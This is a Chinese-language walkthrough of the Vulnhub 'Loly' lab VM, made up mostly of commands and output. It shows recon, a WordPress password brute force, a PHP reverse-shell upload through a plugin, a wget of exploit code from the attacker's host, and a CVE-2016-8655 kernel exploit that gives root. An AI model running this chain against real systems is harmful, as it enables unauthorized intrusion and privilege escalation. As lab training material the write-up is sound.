Vulnhub之Loly靶机详细测试过程
Loly
作者:Jason_huawen
靶机基本信息
名称:Loly: 1
地址:
https://www.vulnhub.com/entry/loly-1,538/
识别目标主机IP地址
目标主机无法从Virtualbox自动获取IP地址,先参照本人另文解决该问题。
─(kali㉿kali)-[~/Vulnhub/Loly]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9d:dc:4f 1 60 PCS Systemtechnik GmbH
192.168.56.224 08:00:27:b5:a1:cf 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.224
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Loly]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.224 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 09:13 EST
Nmap scan report for localhost (192.168.56.224)
Host is up (0.00018s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 08:00:27:B5:A1:CF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds
NMAP扫描结果表明目标主机有1个开放端口80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Loly]
└─$ curl http://192.168.56.224/
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>
<p><em>Thank you for using nginx.</em></p>
</body>
</html>
访问80端口,返回nginx的默认页面。
┌──(kali㉿kali)-[~/Vulnhub/Loly]
└─$ gobuster dir -u http://192.168.56.224 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.224
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/26 09:16:07 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 194] [--> http://192.168.56.224/wordpress/]
Progress: 216027 / 220561 (97.94%)===============================================================
2022/11/26 09:16:25 Finished
===============================================================
gobuster扫描工具发现了/wordpress目录,访问该目录,返回页面源代码中可知主机名为loly.lc,因此将其加入/etc/hosts文件中:
┌──(kali㉿kali)-[~/Vulnhub/Loly]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Loly]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.224 loly.lc
接下来用wpscan扫描一下wordpress目录:
┌──(kali㉿kali)-[~/Vulnhub/Loly]
└─$ wpscan --url http://192.168.56.224/wordpress -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.224/wordpress/ [192.168.56.224]
[+] Started: Sat Nov 26 09:21:53 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.224/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.224/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.224/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.224/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.224/wordpress/, Match: 'WordPress 5.5'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] loly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 26 09:21:56 2022
[+] Requests Done: 47
[+] Cached Requests: 4
[+] Data Sent: 12.277 KB
[+] Data Received: 152.456 KB
[+] Memory used: 207.195 MB
[+] Elapsed time: 00:00:02
wpscan工具扫描识别出用户loly,那就看能否爆破出其密码:
┌──(kali㉿kali)-[~/Vulnhub/Loly]
└─$ wpscan --url http://192.168.56.224/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.224/wordpress/ [192.168.56.224]
[+] Started: Sat Nov 26 09:22:14 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.224/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.224/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.224/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.224/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.224/wordpress/, Match: 'WordPress 5.5'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / corazon Time: 00:00:00 < > (175 / 14344567) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: loly, Password: fernando
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 26 09:22:19 2022
[+] Requests Done: 317
[+] Cached Requests: 28
[+] Data Sent: 133.333 KB
[+] Data Received: 128.271 KB
[+] Memory used: 194.805 MB
[+] Elapsed time: 00:00:04
很快密码就被爆破出来了:
username: loly
password: fernando
用上述用户名密码信息登录wordpress管理后台,成功登录,接下来就是如何获得shell.
首先尝试用Metasploit工具:
msf6 > search wp_admin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.224
RHOSTS => 192.168.56.224
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME loly
USERNAME => loly
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD fernando
PASSWORD => fernando
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD fernando yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.224 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME loly yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Authenticating with WordPress using loly:fernando...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.
执行失败!需要另外找方法,而目标的wordpress后台没有editor选项,所以无法通过修改404.php模板实现shell.php的上传。
在Adrotate插件中找到manage media, 将shell.php进行zip压缩,然后成功上传,并提示文件在/banners下,那么具体在什么位置呢,可以通过查看settings,知道具体的目录:
然后访问该shell.php:
http://loly.lc/wordpress/wp-content/banners/shell.php
成功得到了shell
┌──(kali㉿kali)-[~/Vulnhub/Loly]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.224] 40408
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
14:41:00 up 29 min, 0 users, load average: 0.00, 0.00, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
提权
将linpeas.sh脚本上传至目标主机的/tmp目录下,修改权限,并执行该脚本,在脚本输出结果中发现了wp-config.php文件含有数据库的用户名密码
╔══════════╣ Analyzing FastCGI Files (limit 70)
-rw-r--r-- 1 root root 1007 Feb 11 2017 /etc/nginx/fastcgi_params
╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-r--r-- 1 loly www-data 3014 Aug 20 2020 /var/www/html/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
define( 'DB_HOST', 'localhost' );
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Sep 30 2013 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
由于数据库的密码中含有Loly,所以猜测该密码同时也是loly的shell密码:
www-data@ubuntu:/tmp$ su - loly
su - loly
Password: lolyisabeautifulgirl
loly@ubuntu:~$ id
id
uid=1000(loly) gid=1000(loly) groups=1000(loly),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
loly@ubuntu:~$ sudo -l
sudo -l
[sudo] password for loly: lolyisabeautifulgirl
Sorry, user loly may not run sudo on ubuntu.
loly@ubuntu:~$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/vmware-user-suid-wrapper
/usr/bin/gpasswd
/usr/bin/sudo
/bin/su
/bin/ntfs-3g
/bin/umount
/bin/ping6
/bin/ping
/bin/fusermount
/bin/mount
loly@ubuntu:~$
搜寻了一番,Loly用户不在sudo 列表中,也没有可用SUID命令,但是回看 一下linpeas.sh执行结果,可以知道有漏洞可以利用:
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[3] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010
我们选择第一个漏洞,将其下载到本地,并上传到目标主机的/tmp目录下,根据代码本身所给出的编译方法进行编译,然后执行,从而获得root shell.
loly@ubuntu:~$ cd /tmp
cd /tmp
loly@ubuntu:/tmp$ wget http://192.168.56.206:8000/exploit.c
wget http://192.168.56.206:8000/exploit.c
--2022-11-26 15:05:45-- http://192.168.56.206:8000/exploit.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20792 (20K) [text/x-csrc]
Saving to: ‘exploit.c’
exploit.c 100%[===================>] 20.30K --.-KB/s in 0s
2022-11-26 15:05:45 (91.8 MB/s) - ‘exploit.c’ saved [20792/20792]
loly@ubuntu:/tmp$ ls
ls
exploit.c
linpeas.sh
systemd-private-ee46d21c81c84260a41e0df16ef1c198-systemd-timesyncd.service-GeGVIS
VMwareDnD
loly@ubuntu:/tmp$ gcc exploit.c -o exploit -lpthread
gcc exploit.c -o exploit -lpthread
loly@ubuntu:/tmp$ ls
ls
exploit
exploit.c
linpeas.sh
systemd-private-ee46d21c81c84260a41e0df16ef1c198-systemd-timesyncd.service-GeGVIS
VMwareDnD
loly@ubuntu:/tmp$ chmod +x exploit
chmod +x exploit
loly@ubuntu:/tmp$ ./exploit
./exploit
linux AF_PACKET race condition exploit by rebel
kernel version: 4.4.0-31-generic #50
proc_dostring = 0xffffffff81087ea0
modprobe_path = 0xffffffff81e48f80
register_sysctl_table = 0xffffffff81286e90
set_memory_rw = 0xffffffff8106f370
exploit starting
making vsyscall page writable..
new exploit attempt starting, jumping to 0xffffffff8106f370, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 588953, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 0
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f370, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 142017, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f370, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 214401, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying.......
vsyscall page altered!
stage 1 completed
registering new sysctl..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 140959, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 0
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 80885, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 102905, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 93373, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 0
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 101189, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 0
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 464437, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 456611, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 0
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 139143, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 0
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 115791, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 103667, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 58823, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 0
race not won
retrying stage..
new exploit attempt starting, jumping to 0xffffffff81286e90, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 204087, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying.......
sysctl added!
stage 2 completed
binary executed by kernel, launching rootshell
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)
root@ubuntu:/tmp# cd /root
cd /root
root@ubuntu:/root# ls -alh
ls -alh
total 32K
drwx------ 3 root root 4.0K Nov 26 14:03 .
drwxr-xr-x 22 root root 4.0K Aug 19 2020 ..
-rw------- 1 root root 1.6K Aug 20 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4.0K Nov 26 14:03 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 266 Aug 19 2020 root.txt
-rw-r--r-- 1 root root 75 Aug 20 2020 .selected_editor
root@ubuntu:/root# cat root.txt
cat root.txt
____ ____ ____ ____
/ ___| _ _ _ __ / ___/ ___|| _ \
\___ \| | | | '_ \| | \___ \| |_) |
___) | |_| | | | | |___ ___) | _ <
|____/ \__,_|_| |_|\____|____/|_| \_\
Congratulations. I'm BigCityBoy
root@ubuntu:/root#
成功提权,获得root flag.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
